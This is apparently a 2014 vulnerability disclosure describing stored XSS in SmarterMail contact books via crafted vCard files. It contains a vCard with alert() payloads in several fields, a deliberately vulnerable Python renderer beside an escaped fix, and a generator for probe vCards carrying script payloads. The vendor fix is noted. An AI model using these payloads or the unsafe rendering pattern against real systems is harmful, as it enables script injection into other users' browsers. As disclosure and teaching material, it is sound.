[XSS] Brief Security Review – SmarterMail 12.0 and 5.5 Enterprise

SMARTERMAIL 12.0.x FREE EDITION:

Vulnerability 1:
Contact Book XSS:

It is possible to send someone a malicious .vcf contact file; assuming they import and view it through the SmarterMail web interface, the injected code executes when the contact book is viewed, because the vCard field values are rendered into the page without output encoding.
The following .vcf fields were used, with the JavaScript payload alert(1) as the attack command:

[image: v12_contact]
The following was the result of the above XSS attack:
[image: v12]

Version 5.5 Enterprise:
The vCard fields used are shown below (the fields carrying alert() calls are the ones that executed):

BEGIN:VCARD
ADR;HOME=TRUE:;;foo11;foo12;foo13;foo14;foo15
ADR;WORK=TRUE:;foo25;foo18;foo19;foo20;foo21;foo22
EMAIL;INTERNET=TRUE:alert(2)
FN:foo1 foo2 foo3 foo4
N:foo3;foo1;foo2;;foo4
NOTE:foo24
ORG:alert(6);foo17
PRODID:-//SmarterTools//SmarterMail//EN
REV:20140119T173038Z
SORT-STRING:alert(1)
TEL;ISDN=TRUE:foo10
TEL;PAGER=TRUE:foo8
TEL;CELL=TRUE;VOICE=TRUE:alert(4)
TEL;HOME=TRUE;VOICE=TRUE:foo7
TEL;WORK=TRUE;VOICE=TRUE:alert(3)
TEL;HOME=TRUE;FAX=TRUE:foo9
TEL;WORK=TRUE;FAX=TRUE:alert(5)
TITLE:foo16
URL:foo6
END:VCARD

[image: 5.5_address]

Visiting the contacts page executes the injected code, as the result below shows:

[image: 5.5_address_result]

The vCards used in these attacks can be viewed here:
[ .TXT ] VCard Version 12.0
[ .TXT ] VCard Version 5.5 Enterprise
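To make the root cause concrete, here is an added example (written for this review, not SmarterMail's own code) of the bug class behind both findings: a contact-book renderer that concatenates raw vCard values into HTML, beside the hardened version that HTML-encodes every value at output time. The sample vCard is constructed test data modelled on the listing above; it uses explicit script and img probes where the post's listing shows bare alert() calls. The parser, the renderers, the field list and the probe-vCard generator (which numbers a payload per field, the same trick as the foo1..foo25 canaries above) are all illustrative and assumed, not taken from the product.

```python
"""Added example (not SmarterMail's code): why a crafted .vcf becomes stored
XSS in a web contact book, and the output-encoding fix. All names and data
here are illustrative."""
import html
import re

# Constructed sample vCard, modelled on the one in the post. The script/img
# probes stand in for the alert() payloads the post shows; test data only.
SAMPLE_VCARD = """BEGIN:VCARD
FN:foo1 foo2
N:foo2;foo1;;;
EMAIL;INTERNET=TRUE:<script>alert(2)</script>
ORG:<img src=x onerror=alert(6)>;foo17
TEL;WORK=TRUE;VOICE=TRUE:<script>alert(3)</script>
NOTE:foo24
URL:http://example.invalid/foo6
END:VCARD
"""

# Properties worth seeding with a canary, taken from the field list in the post.
PROBE_PROPERTIES = [
    "FN", "N", "ORG", "TITLE", "NOTE", "URL", "SORT-STRING",
    "EMAIL;INTERNET=TRUE", "TEL;CELL=TRUE;VOICE=TRUE",
    "TEL;WORK=TRUE;VOICE=TRUE", "TEL;WORK=TRUE;FAX=TRUE",
]


def parse_vcard(text):
    """Minimal vCard reader: unfold continuation lines, then split each
    content line into (PROPERTY, {PARAM: value}, raw value)."""
    unfolded = re.sub(r"\r?\n[ \t]", "", text)
    fields = []
    for line in unfolded.splitlines():
        if not line or line in ("BEGIN:VCARD", "END:VCARD"):
            continue
        head, _, value = line.partition(":")
        name, *params = head.split(";")
        pdict = {}
        for param in params:
            key, _, val = param.partition("=")
            pdict[key.upper()] = val
        fields.append((name.upper(), pdict, value))
    return fields


def render_unsafe(fields):
    """Vulnerable renderer: raw vCard values are concatenated into markup.
    This is the bug class the post describes; shown for contrast only."""
    rows = "".join(f"<tr><th>{name}</th><td>{value}</td></tr>"
                   for name, _, value in fields)
    return f"<table>{rows}</table>"


def render_safe(fields):
    """Hardened renderer: HTML-encode every untrusted value at output time,
    so a field value can never close or open a tag or attribute."""
    rows = "".join(
        f"<tr><th>{html.escape(name)}</th><td>{html.escape(value, quote=True)}</td></tr>"
        for name, _, value in fields)
    return f"<table>{rows}</table>"


def find_reflected_fields(fields, render):
    """Return the property names whose markup-bearing value survives the
    renderer verbatim, i.e. the fields that would execute in a browser."""
    return [name for name, params, value in fields
            if "<" in value and value in render([(name, params, value)])]


def build_probe_vcard(payload="<script>alert({n})</script>"):
    """Build a tester's vCard that seeds a numbered payload into each property,
    so the contact book itself reveals which fields reflect (the post's
    foo1..foo25 numbering does the same with harmless strings)."""
    lines = ["BEGIN:VCARD"]
    for n, prop in enumerate(PROBE_PROPERTIES, start=1):
        lines.append(f"{prop}:{payload.format(n=n)}")
    lines.append("END:VCARD")
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    fields = parse_vcard(SAMPLE_VCARD)
    print("unsafe renderer reflects:", find_reflected_fields(fields, render_unsafe))
    print("safe renderer reflects:  ", find_reflected_fields(fields, render_safe))
    print(build_probe_vcard())
```

Run stand-alone, the script reports that the vulnerable renderer reflects EMAIL, ORG and TEL while the hardened one reflects nothing, and prints a probe vCard you could import into any contact book under test. The point of the contrast is that the fix belongs at the output boundary: encoding at render time protects every field, including ones a tester did not think to seed, whereas filtering on import only catches the payloads you anticipated.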

This issue was reported to SmarterTools, and I am happy to report that the issues have been resolved speedily with a new build, in version numbers at and after 12.0.5197.19984.


~ by Rhys Mossom on April 28, 2014.
